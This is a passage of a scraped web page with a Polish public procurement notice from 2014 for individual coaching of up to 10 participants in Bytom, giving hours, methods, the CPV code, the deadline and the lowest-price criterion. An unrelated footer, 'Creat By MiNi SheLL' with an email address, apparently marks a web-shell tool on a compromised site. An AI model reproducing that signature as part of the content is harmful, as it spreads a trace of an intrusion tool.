Ponadto w miarę pojawiających się potrzeb, Wykonawca zapewni pracę indywidualną z uczestnikami/uczestniczkami. (przez godzinę Zamawiający rozumie godzinę lekcyjną trwającą 45 min.) Moduł II - stacjonarny Liczba uczestników: maksymalnie 10 osób - uczestników/uczestniczek projektu, wybranych przez trenera rozwoju osobistego spośród uczestników/uczestniczek wyjazdowego modułu I. Czas trwania: zgodnie z zatwierdzonym harmonogramem, od poniedziałku do piątku w okresie od dnia 04 sierpnia 2014 r. do dnia 30 września 2014 r.Miejsce odbywania zajęć: miasto Bytom i/lub ościenne miasta jeżeli będzie to związane ze spotkaniem z potencjalnym pracodawcą. Liczba godzin spotkań indywidualnych: 100 godzin zegarowych dla maksymalnie 10 uczestników/ uczestniczek. Trener rozwoju osobistego zaplanuje liczbę godzin na uczestników/uczestniczki w grupie zgodnie z indywidualnymi potrzebami.Sposób prowadzenia zajęć: 1.W czasie spotkań indywidualnych trener będzie stosował metodę rozwoju osobistego (coaching), której celem są zmiany obejmujące nie tylko umiejętności społeczne czy zawodowe uczestników/uczestniczek, ale także zmiany na poziomie wartości, przekonań oraz postaw wobec pracy.2. W czasie spotkań indywidualnych trener będzie stosował dla każdego uczestnika/uczestniczki indywidualny konspekt pracy, w którym zostaną określone cele, metody i formy pracy, użyte środki, terminy, przebieg i charakterystyka zajęć, wnioski z przeprowadzonej usługi oraz kartę czasu pracy. Pozostałe informacje dotyczące opisu przedmiotu zamówienia zawiera załącznik C do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com